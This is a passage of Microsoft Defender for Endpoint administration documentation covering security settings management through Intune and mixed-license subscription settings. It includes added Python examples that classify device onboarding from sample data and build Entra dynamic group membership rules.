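         "firstSeen": "2024-02-22T11:40:00Z",
         "lastSeen": "2024-02-22T11:58:00Z", "healthStatus": "Active"},
        {"id": "m-srv03", "computerDnsName": "srv03.contoso.local",
         "firstSeen": "2023-06-01T09:00:00Z",
         "lastSeen": "2024-02-15T12:30:00Z", "healthStatus": "Inactive"},
        {"id": "m-srv04", "computerDnsName": "srv04.contoso.local",
         "firstSeen": "2023-06-01T09:00:00Z",
         "lastSeen": "2024-02-14T12:00:00Z", "healthStatus": "Inactive"},
    ],
})

# Constructed registry of device ids already recorded (the article's SharePoint list).
KNOWN_DEVICE_IDS = {"m-ws01", "m-srv03", "m-srv04"}


def parse_ts(value):
    """Parse API timestamps such as 2024-02-15T11:30:00.1234567Z; the 7-digit
    fraction is trimmed to microseconds so datetime.fromisoformat accepts it."""
    if value.endswith("Z"):
        value = value[:-1] + "+00:00"
    if "." in value:
        head, tail = value.split(".", 1)
        frac, _, offset = tail.partition("+")
        value = f"{head}.{frac[:6]}+{offset}"
    return datetime.fromisoformat(value)


def parse_machines(body):
    """Equivalent of the flow's Parse JSON step: return the 'value' array."""
    return json.loads(body)["value"]


def new_onboardings(machines, known_ids):
    """Steps 10 and 11: devices missing from the registry get a notification;
    they are then recorded so the next run stays silent for them."""
    new = [m["id"] for m in machines if m["id"] not in known_ids]
    known_ids.update(new)
    return new


def classify_by_seen_windows(machines, now=NOW):
    """The lastSeen/firstSeen variant from the tips. Onboarding: firstSeen in
    the past hour. Offboarding candidate: lastSeen in [now-7d, now-7d+60min).
    Each device falls into a window on exactly one hourly run, so no duplicates."""
    hour = timedelta(hours=1)
    week_ago = now - timedelta(days=7)
    onboarded, offboard_candidates = [], []
    for m in machines:
        first, last = parse_ts(m["firstSeen"]), parse_ts(m["lastSeen"])
        if last >= now - hour and first >= now - hour:
            onboarded.append(m["id"])
        if week_ago <= last < week_ago + hour:
            offboard_candidates.append(m["id"])
    return onboarded, offboard_candidates


def odata_filters(now=NOW):
    """Server-side $filter strings for the two split queries (assumed OData
    syntax on lastSeen), so large tenants do not have to page every device."""
    def fmt(dt):
        return dt.strftime("%Y-%m-%dT%H:%M:%SZ")
    start = now - timedelta(days=7)
    return {
        "offboarding": f"lastSeen ge {fmt(start)} and lastSeen lt {fmt(start + timedelta(hours=1))}",
        "onboarding": f"lastSeen ge {fmt(now - timedelta(hours=1))}",
    }


if __name__ == "__main__":
    machines = parse_machines(SAMPLE_RESPONSE)
    print("not yet registered:", new_onboardings(machines, set(KNOWN_DEVICE_IDS)))
    print("by time windows:", classify_by_seen_windows(machines))
    print("filters:", odata_filters())
```

With the sample data, the registry check reports only m-ws02 as new, and the window variant reports m-ws02 as onboarded and m-srv03 (last seen 7 days ago within the current hour) as an offboarding candidate; m-srv04, last seen 8 days ago, was already in that window on an earlier run and is not reported again.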


Manage endpoint security policies on
devices onboarded to Microsoft
Defender for Endpoint
Article • 02/06/2024

When you use Microsoft Defender for Endpoint, you can deploy endpoint security
policies from Microsoft Intune to manage the Defender security settings on the devices
you’ve onboarded to Defender without enrolling those devices with Intune. This
capability is known as Defender for Endpoint security settings management.

When you manage devices through security settings management:

You can use the Microsoft Intune admin center or the Microsoft 365 Defender
portal to configure policies for endpoint security for Defender for Endpoint and
assign those policies to Microsoft Entra ID groups. The Defender portal includes
the user interface for device views, policy management, and reports for security
settings management.

To view guidance on managing the Intune endpoint security policies from within
the Defender portal, see Manage endpoint security policies in Microsoft Defender
for Endpoint in the Defender content.

Devices get their assigned policies based on their Entra ID device object. A device
that isn’t already registered in Microsoft Entra is joined as part of this solution.

When a device receives a policy, the Defender for Endpoint components on the
device enforce the policy and report on the device's status. The device's status is
available in the Microsoft Intune admin center and the Microsoft Defender portal.

This scenario extends the Microsoft Intune Endpoint Security surface to devices that
aren't capable of enrolling in Intune. When a device is managed by Intune (enrolled to
Intune) the device doesn't process policies for Defender for Endpoint security settings
management. Instead, use Intune to deploy policy for Defender for Endpoint to your
devices.

Applies to:

Windows 10 and Windows 11
Windows Server (2012 R2 and up)
Linux
macOS

Prerequisites
Review the following sections for the requirements of the Defender for Endpoint security
settings management scenario.

Environment
When a supported device onboards to Microsoft Defender for Endpoint:

The device is surveyed for an existing Microsoft Intune presence, which is a mobile
device management (MDM) enrollment to Intune.
Devices without an Intune presence enable the security settings management
feature.
For devices that aren't fully Microsoft Entra registered, a synthetic device identity is
created in Microsoft Entra ID that allows the device to retrieve policies. Fully
registered devices use their current registration.
Policies retrieved from Microsoft Intune are enforced on the device by Microsoft
Defender for Endpoint.

Security settings management isn't yet supported with Government clouds. For more
information, see Feature parity with commercial in Microsoft Defender for Endpoint for US
Government customers.

Connectivity requirements
Devices must have access to the following endpoint:

*.dm.microsoft.com - The use of a wildcard supports the cloud-service endpoints
that are used for enrollment, check-in, and reporting, and which can change as the
service scales.

Supported platforms
Policies for Microsoft Defender for Endpoint security management are supported for the
following device platforms:

Linux:

With Microsoft Defender for Endpoint for Linux agent version 101.23052.0009 or later,
security settings management supports the following Linux distributions:

Red Hat Enterprise Linux 7.2 or higher
CentOS 7.2 or higher
Ubuntu 16.04 LTS or higher LTS
Debian 9 or higher
SUSE Linux Enterprise Server 12 or higher
Oracle Linux 7.2 or higher
Amazon Linux 2
Fedora 33 or higher

To confirm the version of the Defender agent, in the Defender portal go to the devices
page, and on the devices Inventories tab, search for Defender for Linux. For guidance on
updating the agent version, see Deploy updates for Microsoft Defender for Endpoint on
Linux.

Known issue: With the Defender agent version 101.23052.0009, Linux devices fail to
enroll when they're missing the following filepath: /sys/class/dmi/id/board_vendor .

macOS:

With Microsoft Defender for Endpoint for macOS agent version 101.23052.0004 or later,
security settings management supports the following macOS versions:

macOS 14 (Sonoma)
macOS 13 (Ventura)
macOS 12 (Monterey)
macOS 11 (Big Sur)

To confirm the version of the Defender agent, in the Defender portal go to the devices
page, and on the devices Inventories tab, search for Defender for macOS. For guidance
on updating the agent version, see Deploy updates for Microsoft Defender for Endpoint
on macOS.

Known issue: With the Defender agent version 101.23052.0004, macOS devices that are
registered in Microsoft Entra ID before enrolling with security settings management
receive a duplicate Device ID in Microsoft Entra ID, which is a synthetic registration.
When you create a Microsoft Entra group for targeting policy, you must use the
synthetic Device ID created by security settings management. In Microsoft Entra ID, the
Join Type column for the synthetic Device ID is blank.

Windows:

Windows 10 Professional/Enterprise (with KB5006738)
Windows 11 Professional/Enterprise
Windows Server 2012 R2 with Microsoft Defender for Down-Level Devices
Windows Server 2016 with Microsoft Defender for Down-Level Devices
Windows Server 2019 (with KB5006744)
Windows Server 2022 (with KB5006745)

Security settings management doesn't work on and isn't supported with the following
devices:

Non-persistent desktops, like Virtual Desktop Infrastructure (VDI) clients or Azure
Virtual Desktops.
Domain Controllers

Important

In some cases, Domain Controllers that run a down-level server operating
system (2012 R2 or 2016) can unintentionally be managed by Microsoft Defender
for Endpoint. To ensure that this doesn't happen in your environment, we
recommend making sure your domain controllers are neither tagged "MDE-Management"
nor managed by MDE.

Licensing and subscriptions

To use security settings management, you need:

A subscription that grants licenses for Microsoft Defender for Endpoint, like
Microsoft 365, or a standalone license for only Microsoft Defender for Endpoint. A
subscription that grants Microsoft Defender for Endpoint licenses also grants your
tenant access to the Endpoint security node of the Microsoft Intune admin center.

Note

Exception: If you have access to Microsoft Defender for Endpoint only
through Microsoft Defender for servers (part of Microsoft Defender for Cloud,
formerly Azure Security Center), the security settings management
functionality isn't available. You will need to have at least one Microsoft
Defender for Endpoint (user) subscription license active.

The Endpoint security node is where you configure and deploy policies to manage
Microsoft Defender for Endpoint for your devices and monitor device status.

For current information about options, see Minimum requirements for Microsoft
Defender for Endpoint.

Architecture
The following diagram is a conceptual representation of the Microsoft Defender for
Endpoint security configuration management solution.

1. Devices onboard to Microsoft Defender for Endpoint.

2. Devices communicate with Intune. This communication enables Microsoft Intune
to distribute policies that are targeted to the devices when they check in.

3. A registration is established for each device in Microsoft Entra ID:
If a device was previously fully registered, like a Hybrid Join device, the
existing registration is used.
For devices that haven't been registered, a synthetic device identity is created
in Microsoft Entra ID to enable the device to retrieve policies. When a device
with a synthetic registration has a full Microsoft Entra registration created for
it, the synthetic registration is removed and the device's management
continues uninterrupted by using the full registration.

4. Defender for Endpoint reports the status of the policy back to Microsoft Intune.

Important

Security settings management uses a synthetic registration for devices that don't
fully register in Microsoft Entra ID, and drops the Microsoft Entra hybrid join
prerequisite. With this change, Windows devices that previously had enrollment
errors will begin onboarding to Defender and then receive and process the security
settings management policies.

To filter for devices that were unable to enroll due to failing to meet the Microsoft
Entra hybrid join prerequisite, navigate to the Devices list in the Microsoft Defender
portal, and filter by enrollment status. Because these devices are not fully
registered, their device attributes show MDM = Intune and Join Type = Blank.
These devices will now enroll with security settings management using the
synthetic registration.

After enrolling, these devices appear in the device lists for the Microsoft Defender,
Microsoft Intune, and Microsoft Entra portals. While the devices won't be fully
registered with Microsoft Entra, their synthetic registration counts as one device
object.

What to expect in the Microsoft Defender portal

You can use the Microsoft Defender XDR Device inventory to confirm a device is using
the security settings management capability in Defender for Endpoint, by reviewing the
device's status in the Managed by column. The Managed by information is also available
on the device's side panel or device page. Managed by should consistently indicate that
it's managed by MDE.

You can also confirm a device has enrolled in security settings management successfully
by confirming that the device side panel or device page displays MDE Enrollment status
as Success.

If the MDE Enrollment status doesn't display Success, make sure you're looking at a
device that was updated and is in scope for security settings management. (You
configure the scope on the Enforcement scope page while configuring security settings
management.)

What to expect in the Microsoft Intune admin center

In the Microsoft Intune admin center, go to the All Devices page. Devices enrolled with
security settings management appear here as in the Defender portal. In the admin
center, the device's Managed by field should display MDE.

Tip

In June 2023, security settings management began using synthetic registration for
devices that don't fully register in Microsoft Entra. With this change, devices that
previously had enrollment errors will begin onboarding to Defender and then
receive and process the security settings management policies.

What to expect in the Microsoft Azure portal

On the All devices page in the Microsoft Azure portal, you can view device details.

To ensure that all devices enrolled in Defender for Endpoint security settings
management receive policies, we recommend creating a dynamic Microsoft Entra group
based on the devices’ OS Type. With a dynamic group, devices that are managed by
Defender for Endpoint are automatically added to the group without requiring admins
to perform other tasks, like creating a new policy.

Important

From July 2023 to September 25, 2023, security settings management ran an opt-in
public preview that introduced new behavior for devices that were managed and
enrolled to the scenario. Starting on September 25, 2023, the public preview
behavior became generally available and now applies to all tenants that use
security settings management.

If you used security settings management prior to September 25, 2023, and did not
join the opt-in public preview that ran from July 2023 to September 25, 2023,
review your Microsoft Entra groups that rely on system labels to make changes that
will identify new devices you manage with security settings management. This is
because prior to September 25, 2023, devices not managed through the opt-in
public preview would use the following system labels (tags) of MDEManaged and
MDEJoined to identify managed devices. These two system labels are no longer
supported and are no longer added to devices that enroll.

Use the following guidance for your Dynamic groups:

(Recommended) When targeting policy, use dynamic groups based on the device
platform by using the deviceOSType attribute (Windows, Windows Server, macOS,
Linux) to ensure policy continues to be delivered for devices that change
management types, for example during MDM enrollment.
If necessary, dynamic groups containing exclusively devices that are managed by
Defender for Endpoint can be targeted by defining a dynamic group using the
managementType attribute MicrosoftSense. Use of this attribute targets all devices
that are managed by Defender for Endpoint via the security settings management
functionality, and devices remain in this group only while managed by Defender
for Endpoint.

Also, when configuring security settings management, if you intend to manage entire
OS platform fleets using Microsoft Defender for Endpoint, by selecting all devices
instead of tagged devices in the Microsoft Defender for Endpoint Enforcement Scope
page, understand that any synthetic registrations are counted against Microsoft Entra ID
quotas the same as full registrations.

Which solution should I use?

Microsoft Intune includes several methods and policy types to manage the
configuration of Defender for Endpoint on devices. The following table identifies the
Intune policies and profiles that support deployment to devices managed by Defender
for Endpoint security settings management and can help you identify if this solution is
right for your needs.

When you deploy an endpoint security policy that’s supported for both Defender for
Endpoint security settings management and Microsoft Intune, a single instance of that
policy can be processed by:

Devices supported through security settings management (Microsoft Defender)
Devices that are managed by either Intune or Configuration Manager.

Profiles for the Windows 10 and later platform aren't supported for devices managed by
security settings management.

The following profiles are supported for each device type:

Linux
The following policy types support the Linux platform.

Endpoint security policy          Profile                                   Defender for Endpoint security settings management   Microsoft Intune
Antivirus                         Microsoft Defender Antivirus              Supported                                            Supported
Antivirus                         Microsoft Defender Antivirus exclusions   Supported                                            Supported
Endpoint detection and response   Endpoint detection and response           Supported                                            Supported

macOS
The following policy types support the macOS platform.

Endpoint security policy          Profile                                   Defender for Endpoint security settings management   Microsoft Intune
Antivirus                         Microsoft Defender Antivirus              Supported                                            Supported
Antivirus                         Microsoft Defender Antivirus exclusions   Supported                                            Supported
Endpoint detection and response   Endpoint detection and response           Supported                                            Supported

Windows 10, Windows 11, and Windows Server

To support use with Microsoft Defender security settings management, your policies for
Windows devices must use the Windows 10, Windows 11, and Windows Server platform.
Each profile for the Windows 10, Windows 11, and Windows Server platform can apply to
devices that are managed by Intune and to devices that are managed by security
settings management.

Endpoint security policy          Profile                                   Defender for Endpoint security settings management   Microsoft Intune
Antivirus                         Defender Update controls                  Supported                                            Supported
Antivirus                         Microsoft Defender Antivirus              Supported                                            Supported
Antivirus                         Microsoft Defender Antivirus exclusions   Supported                                            Supported
Antivirus                         Windows Security Experience               Not supported (see note 1)                           Supported
Attack Surface Reduction          Attack Surface Reduction Rules            Supported                                            Supported
Endpoint detection and response   Endpoint detection and response           Supported                                            Supported
Firewall                          Firewall                                  Supported                                            Supported
Firewall                          Firewall Rules                            Supported                                            Supported

1 - The Windows Security Experience profile is available in the Defender portal but only
applies to devices managed by Intune. It isn't supported for devices managed by
Microsoft Defender security settings management.

Endpoint security policies are discrete groups of settings intended for use by security
admins who focus on protecting devices in your organization. The following are
descriptions of the policies that support security settings management:

Antivirus policies manage the security configurations found in Microsoft Defender
for Endpoint. See antivirus policy for endpoint security.

Note

While endpoints do not require a restart in order to apply modified settings or
new policies, we are aware of an issue where the AllowOnAccessProtection and
DisableLocalAdminMerge settings might at times require end users to restart
their devices for these settings to update. We are currently investigating this
issue in order to provide a resolution.

Attack surface reduction (ASR) policies focus on minimizing the places where your
organization is vulnerable to cyberthreats and attacks. With security settings
management, ASR rules apply to devices that run Windows 10, Windows 11, and
Windows Server.
For current guidance about which settings apply to the different platforms and
versions, see ASR rules supported operating systems in the Windows Threat
protection documentation.

Tip

To help keep supported endpoints up to date, consider using the modern
unified solution for Windows Server 2012 R2 and 2016.

Also see:
Overview of attack surface reduction in the Windows Threat protection
documentation.
Attack surface reduction policy for endpoint security, in the Intune
documentation.

Endpoint detection and response (EDR) policies manage the Defender for
Endpoint capabilities that provide advanced attack detections that are near real-
time and actionable. Based on EDR configurations, security analysts can prioritize
alerts effectively, gain visibility into the full scope of a breach, and take response
actions to remediate threats. See endpoint detection and response policy for
endpoint security.

Firewall policies focus on the Defender firewall on your devices. See firewall policy
for endpoint security.

Firewall Rules configure granular rules for Firewalls, including specific ports,
protocols, applications, and networks. See firewall policy for endpoint security.

Configure your tenant to support Defender for Endpoint security settings management
To support security settings management through the Microsoft Intune admin center,
you must enable communication between them from within each console.

The following sections guide you through that process.

Configure Microsoft Defender for Endpoint

In the Microsoft Defender for Endpoint portal, as a security administrator:

1. Sign in to the Microsoft Defender portal and go to Settings > Endpoints >
Configuration Management > Enforcement Scope and enable the platforms for
security settings management.

Note

If you have the Manage security settings in Security Center permission in the
Microsoft Defender for Endpoint portal, and are simultaneously enabled to
view devices from all Device Groups (no role-based access control limits on
your user permissions), you can also perform this action.

2. Initially, we recommend testing the feature for each platform by selecting the
platforms option for On tagged devices, and then tagging the devices with the
MDE-Management tag.

Important

Use of Microsoft Defender for Endpoint's Dynamic tag capability to tag
devices with MDE-Management isn't currently supported with security settings
management. Devices tagged through this capability won't successfully enroll.
This issue remains under investigation.

Tip

Use the proper device tags to test and validate your rollout on a small number
of devices. When you select All devices, any device that falls into the configured
scope is automatically enrolled.
3. Configure the feature for Microsoft Defender for Cloud onboarded devices and
Configuration Manager authority settings to fit your organization's needs:

Tip

To ensure your Microsoft Defender for Endpoint portal users have consistent
permissions across portals, if not already provided, request that your IT
administrator grant them the Microsoft Intune Endpoint Security Manager
built-in RBAC role.

Configure Intune
In the Microsoft Intune admin center, your account needs permissions equal to the Endpoint
Security Manager built-in role-based access control (RBAC) role.

1. Sign in to the Microsoft Intune admin center.

2. Select Endpoint security > Microsoft Defender for Endpoint, and set Allow
Microsoft Defender for Endpoint to enforce Endpoint Security Configurations to
On.

When you set this option to On, all devices in the platform scope for Microsoft
Defender for Endpoint that aren't managed by Microsoft Intune qualify to onboard
to Microsoft Defender for Endpoint.

Onboard devices to Microsoft Defender for Endpoint
Microsoft Defender for Endpoint supports several options to onboard devices. For
current guidance, see Onboard to Microsoft Defender for Endpoint in the Defender for
Endpoint documentation.

Coexistence with Microsoft Configuration Manager
In some environments it might be desired to use security settings management with
devices managed by Configuration Manager. If you use both, you need to control policy
through a single channel. Use of more than one channel creates the opportunity for
conflicts and undesired results.

To support this, configure the Manage Security settings using Configuration Manager
toggle to Off. Sign in to the Microsoft Defender portal and go to Settings >
Endpoints > Configuration Management > Enforcement Scope:

Create Microsoft Entra Groups

After devices onboard to Defender for Endpoint, you'll need to create device groups to
support deployment of policy for Microsoft Defender for Endpoint. To identify devices
that have enrolled with Microsoft Defender for Endpoint but aren't managed by Intune
or Configuration Manager:

1. Sign in to the Microsoft Intune admin center.

2. Go to Devices > All devices, and then select the column Managed by to sort the
view of devices. Devices that onboard to Microsoft Defender for Endpoint but
aren't managed by Intune display Microsoft Defender for Endpoint in the Managed
by column. These devices can receive policies for security settings management.

Devices that onboard to Microsoft Defender for Endpoint and have registered but
aren't managed by Intune display Microsoft Defender for Endpoint in the
Managed by column. These are the devices that can receive policy for security
management for Microsoft Defender for Endpoint.

Starting on September 25, 2023, devices that use security management for
Microsoft Defender for Endpoint can no longer be identified by using the following
system labels:

MDEJoined - A now deprecated tag that was previously added to devices
that were joined to the directory as part of this scenario.
MDEManaged - A now deprecated tag that was previously added to devices
that actively used the security management scenario. This tag is removed
from the device if Defender for Endpoint stops managing the security
configuration.

Instead of using system labels, you can use the management type attribute, and
configure it to MicrosoftSense.

You can create groups for these devices in Microsoft Entra or from within the Microsoft
Intune admin center. When creating groups, you can use the OS value for a device if
you're deploying policies to devices running Windows Server vs devices that run a client
version of Windows:

Windows 10 and Windows 11 - The deviceOSType or OS displays as Windows
Windows Server - The deviceOSType or OS displays as Windows Server
Linux Device - The deviceOSType or OS displays as Linux

Sample Intune Dynamic Groups with Rule Syntax

Windows Workstations:

Windows Servers:

Linux Devices:

Important

In May 2023, deviceOSType updated to distinguish between Windows clients and
Windows Servers.

Custom scripts and Microsoft Entra dynamic device groups created before this
change that specify rules that reference only Windows might exclude Windows
Servers when used with the Security Management for Microsoft Defender for
Endpoint solution. For example:

If you have a rule that uses the equals or not equals operator to identify
Windows, this change will affect your rule. That is because previously both
Windows and Windows Server were reported as Windows. To continue to
include both, you must update the rule to also reference Windows Server.
If you have a rule that uses the contains or like operator to specify Windows,
then the rule won't be affected by this change. These operators can find both
Windows and Windows Server.
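The three sample rules whose syntax did not survive above, and the equals-versus-contains behaviour the Important note describes, as an added Python example that is not the article's own sample rules: it builds Microsoft Entra dynamic membership rules over the deviceOSType and managementType attributes the article names, evaluates them against constructed device records with a toy evaluator (not Entra's rule engine; it covers only the operators used here and compares strings case-sensitively), and shows the request body assumed for creating such a group through Microsoft Graph.

```python
"""Build and evaluate Microsoft Entra dynamic membership rules for devices
managed by Defender for Endpoint security settings management (added example)."""
import re

# deviceOSType values named in the article.
DEVICE_OS_TYPES = ("Windows", "Windows Server", "Linux", "macOS")

# Constructed sample Entra device objects (not real tenant data).
SAMPLE_DEVICES = [
    {"displayName": "ws01", "deviceOSType": "Windows", "managementType": "MicrosoftSense"},
    {"displayName": "ws02", "deviceOSType": "Windows", "managementType": "MDM"},
    {"displayName": "srv03", "deviceOSType": "Windows Server", "managementType": "MicrosoftSense"},
    {"displayName": "lx04", "deviceOSType": "Linux", "managementType": "MicrosoftSense"},
]


def membership_rule(os_type, mde_only=False):
    """Recommended rule: target by platform; optionally restrict to devices
    currently managed by Defender for Endpoint (managementType MicrosoftSense)."""
    if os_type not in DEVICE_OS_TYPES:
        raise ValueError(f"unknown deviceOSType {os_type!r}")
    rule = f'(device.deviceOSType -eq "{os_type}")'
    if mde_only:
        rule += ' and (device.managementType -eq "MicrosoftSense")'
    return rule


def dynamic_group_payload(display_name, rule):
    """Assumed request body for POST https://graph.microsoft.com/v1.0/groups:
    a security group whose device membership is computed from the rule."""
    return {
        "displayName": display_name,
        "mailEnabled": False,
        "mailNickname": re.sub(r"[^A-Za-z0-9]", "", display_name)[:64] or "group",
        "securityEnabled": True,
        "groupTypes": ["DynamicMembership"],
        "membershipRule": rule,
        "membershipRuleProcessingState": "On",
    }


# One parenthesised clause: (device.<attribute> <operator> "<value>")
_CLAUSE = re.compile(
    r'^\s*\(device\.(\w+)\s+(-eq|-ne|-contains|-notContains)\s+"([^"]*)"\)\s*$'
)


def _clause_matches(clause, device):
    m = _CLAUSE.match(clause)
    if not m:
        raise ValueError(f"unsupported clause: {clause}")
    attr, op, value = m.groups()
    actual = device.get(attr) or ""
    return {
        "-eq": actual == value,
        "-ne": actual != value,
        "-contains": value in actual,
        "-notContains": value not in actual,
    }[op]


def evaluate_rule(rule, device):
    """Toy evaluator: clauses joined by ' and ' inside groups joined by ' or '."""
    return any(
        all(_clause_matches(c, device) for c in group.split(" and "))
        for group in rule.split(" or ")
    )


def members(rule, devices=SAMPLE_DEVICES):
    """Display names of the sample devices the rule would place in the group."""
    return [d["displayName"] for d in devices if evaluate_rule(rule, d)]


if __name__ == "__main__":
    old_rule = membership_rule("Windows")          # pre-May-2023 style: -eq "Windows"
    both = old_rule + ' or (device.deviceOSType -eq "Windows Server")'
    print("eq Windows        :", members(old_rule))   # servers excluded
    print("eq Windows or Srv :", members(both))
    print("contains Windows  :", members('(device.deviceOSType -contains "Windows")'))
    print("MDE-managed only  :", members('(device.managementType -eq "MicrosoftSense")'))
    print(dynamic_group_payload("MDE Linux devices", membership_rule("Linux")))
```

With the sample records the -eq "Windows" rule returns only the two workstations, the same rule extended with -eq "Windows Server" (or written with -contains "Windows") also returns srv03, and the managementType rule returns only the devices currently managed by Defender for Endpoint, which is the behaviour the Important note above describes.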

Tip

Users that are delegated the ability to manage endpoint security settings may not
have the ability to implement tenant-wide configurations in Microsoft Intune.
Check with your Intune administrator for more information on roles and
permissions in your organization.

Deploy policy
After creating one or more Microsoft Entra groups that contain devices managed by
Microsoft Defender for Endpoint, you can create and deploy the following policies for
security settings management to those groups. The policies and profiles available vary
by platform.

For the list of policy and profile combinations supported for security settings
management, see the chart in Which solution should I use? earlier in this article.

Tip

Avoid deploying multiple policies that manage the same setting to a device.

Microsoft Intune supports deploying multiple instances of each endpoint security
policy type to the same device, with each policy instance being received by the
device separately. Therefore, a device might receive separate configurations for the
same setting from different policies, which results in a conflict. Some settings (like
Antivirus Exclusions) will merge on the client and apply successfully.

1. Sign in to the Microsoft Intune admin center.

2. Go to Endpoint security, select the type of policy you want to configure, and then
select Create Policy.

3. For the policy, select the Platform and the Profile that you want to deploy. For a list
of the Platforms and Profiles that support security settings management, see the
chart in Which solution should I use? earlier in this article.

Note

The supported profiles apply to devices that communicate through Mobile
Device Management (MDM) with Microsoft Intune and devices that
communicate using the Microsoft Defender for Endpoint client.

Ensure you review your targeting and groups as necessary.

4. Select Create.

5. On the Basics page, enter a name and description for the profile, then choose
Next.

6. On the Configuration settings page, select the settings you want to manage with
this profile.

To learn more about a setting, expand its information dialog and select the Learn
more link to view the on-line Configuration Service Provider (CSP) documentation
or related details, for that setting.

When you're done configuring settings, select Next.

7. On the Assignments page, select the Microsoft Entra groups that receive this
profile. For more information on assigning profiles, see Assign user and device
profiles.

Select Next to continue.

Tip

Assignment filters are not supported for devices managed by security
settings management.
Only Device Objects are applicable for Microsoft Defender for Endpoint
management. Targeting users is not supported.
Policies configured will apply to both Microsoft Intune and Microsoft
Defender for Endpoint clients.

8. Complete the policy creation process and then on the Review + create page,
select Create. The new profile is displayed in the list when you select the policy
type for the profile you created.

9. Wait for the policy to be assigned and view a success indication that policy was
applied.

10. You can validate that settings have applied locally on the client by using the
Get-MpPreference command utility.

Monitor status
Status and reports for policies that target devices in this channel are available from the
policy node under Endpoint security in the Microsoft Intune admin center.

Drill in to the policy type and then select the policy to view its status. You can view the
list of platforms, policy types, and profiles that support security settings management in
the table in Which solution should I use, earlier in this article.

When you select a policy, you can view information about the device check-in status,
and can select:
View report - View a list of devices that received the policy. You can select a device
to drill in and see its per-setting status. You can then select a setting to view more
information about it, including other policies that manage that same setting, which
could be a source of conflict.

Per setting status - View the settings that are managed by the policy, and a count
of success, errors, or conflicts for each setting.

Frequently asked questions and considerations

Device check-in frequency

Devices managed by this capability check in with Microsoft Intune every 90 minutes to
update policy.

You can manually sync a device on demand from the Microsoft Defender portal. Sign in
to the portal and go to Devices. Select a device that is managed by Microsoft Defender
for Endpoint, and then select the Policy sync button.

The Policy sync button only appears for devices that are successfully managed by
Microsoft Defender for Endpoint.

Devices protected by Tamper Protection

If a device has Tamper Protection turned on, it isn't possible to edit the values of Tamper
Protected settings without disabling Tamper Protection first.

Assignment Filters and security settings management

Assignment filters aren't supported for devices communicating through the Microsoft
Defender for Endpoint channel. While assignment filters can be added to a policy that
could target these devices, the devices ignore assignment filters. For assignment filter
support, the device must be enrolled in Microsoft Intune.

Deleting and removing devices

You can delete devices that use this flow by using one of two methods:

From within the Microsoft Intune admin center, go to Devices > All devices,
select a device that displays either MDEJoined or MDEManaged in the Managed by
column, and then select Delete.
You can also remove devices from the scope of Configuration Management in the
Security Center.

Once a device is removed from either location, that change propagates to the other
service.

Unable to enable the Security Management for Microsoft Defender for Endpoint
workload in Endpoint Security

Most initial provisioning flows are typically completed by an Administrator of both
services (such as a Global Administrator). There are some scenarios where Role-based
Administration is used to customize the permissions of administrators. Today, individuals
who are delegated the Endpoint Security Manager role might not have the necessary
permissions to enable this feature.

Microsoft Entra joined devices

Devices that are joined to Active Directory use their existing infrastructure to complete
the Microsoft Entra hybrid join process.

Unsupported security settings

The following security settings are pending deprecation. The Defender for Endpoint
security settings management flow doesn't support these settings:

Expedite telemetry reporting frequency (under Endpoint Detection and Response)
AllowIntrusionPreventionSystem (under Antivirus)
Tamper Protection (under Windows Security Experience). This setting is not
pending deprecation, but is currently not supported.

Use of security settings management on domain controllers

Because a Microsoft Entra ID trust is required, domain controllers aren't currently
supported. We're looking at ways to add this support.

Important

In some cases, domain controllers that run a down-level server operating system
(2012 R2 or 2016) can unintentionally be managed by Microsoft Defender for
Endpoint. To ensure that this doesn't happen in your environment, we recommend
making sure your domain controllers are neither tagged "MDE-Management" nor
managed by MDE.

Server Core installation

Security settings management doesn't support Server Core installations due to Server
Core platform limitations.

PowerShell restrict mode

Security settings management doesn't work for a device that has PowerShell
LanguageMode configured with ConstrainedLanguage mode enabled. For more
information, see about_Language_Modes in the PowerShell documentation.

Managing security through MDE if you were previously using a third-party security
tool

If you previously had a third-party security tool on the machine and are now managing
it with MDE, in rare cases you may see some impact on MDE's ability to manage security
settings. In such cases, as a troubleshooting measure, uninstall and reinstall the
latest version of MDE on your machine.

Next steps
Monitor Defender for Endpoint in Intune
Manage endpoint security policies in Microsoft Defender for Endpoint in the
Defender documentation.

Manage Microsoft Defender for
Endpoint subscription settings across
client devices
Article • 01/02/2024

In Defender for Endpoint, a mixed-licensing scenario is a situation in which an
organization is using a mix of Defender for Endpoint Plan 1 and Plan 2 licenses. The
following table describes examples of mixed-licensing scenarios:

Scenario: Mixed tenant
Use different sets of capabilities for groups of users and their devices. Examples
include:
- Defender for Endpoint Plan 1 and Defender for Endpoint Plan 2
- Microsoft 365 E3 and Microsoft 365 E5

Scenario: Mixed trial
Try a premium level subscription for some users. Examples include:
- Defender for Endpoint Plan 1 (purchased for all users), and Defender for
Endpoint Plan 2 (a trial subscription has been started for some users)
- Microsoft 365 E3 (purchased for all users), and Microsoft 365 E5 (a trial
subscription has been started for some users)

Scenario: Phased upgrades
Upgrade user licenses in phases. Examples include:
- Moving groups of users from Defender for Endpoint Plan 1 to Plan 2
- Moving groups of users from Microsoft 365 E3 to E5

Until recently, mixed-licensing scenarios weren't supported; in cases of multiple
subscriptions, the highest functional subscription would take precedence for your
tenant. Now, you can manage your subscription settings to accommodate mixed
licensing scenarios across client devices. These capabilities enable you to:

Set your tenant to mixed mode and tag devices to determine which client devices
will receive features and capabilities from each plan (we call this option mixed
mode); OR,
Use the features and capabilities from one plan across all your client devices.

You can also use a newly added license usage report to track status.

Note

If you're using Microsoft Defender for Business and you want to switch to Defender
for Endpoint Plan 2, see Change your endpoint security subscription.

Use mixed mode

Set your tenant to mixed mode and tag devices

Important

Mixed-mode settings apply to client endpoints only. Tagging server
devices won't change their subscription state. All server devices running
Windows Server or Linux should have appropriate licenses, such as
Defender for Servers. See Options for onboarding servers.
Make sure to follow the procedures in this article to try mixed-license
scenarios in your environment. Assigning user licenses in the Microsoft
365 admin center (https://admin.microsoft.com) doesn't set your
tenant to mixed mode.
You should have active trial or paid licenses for both Defender for
Endpoint Plan 1 and Plan 2.
To access license information, you must have one of the following roles
assigned in Microsoft Entra ID:
Global Admin
Security Admin
License Admin + MDE Admin

1. As an admin, go to the Microsoft Defender portal (https://security.microsoft.com)
and sign in.

2. Go to Settings > Endpoints > Licenses. Your usage report opens and displays
information about your organization's Defender for Endpoint licenses.

3. Under Subscription state, select Manage subscription settings.

Note

If you don't see Manage subscription settings, at least one of the
following conditions is true:

You have Defender for Endpoint Plan 1 or Plan 2 (but not both); or
Mixed-license capabilities haven't rolled out to your tenant yet.

4. A Subscription settings flyout opens. Choose the option to use Defender for
Endpoint Plan 1 and Plan 2. (No changes will occur until devices are tagged as
per the next step.)

5. Tag the devices that should receive either Defender for Endpoint Plan 1 or
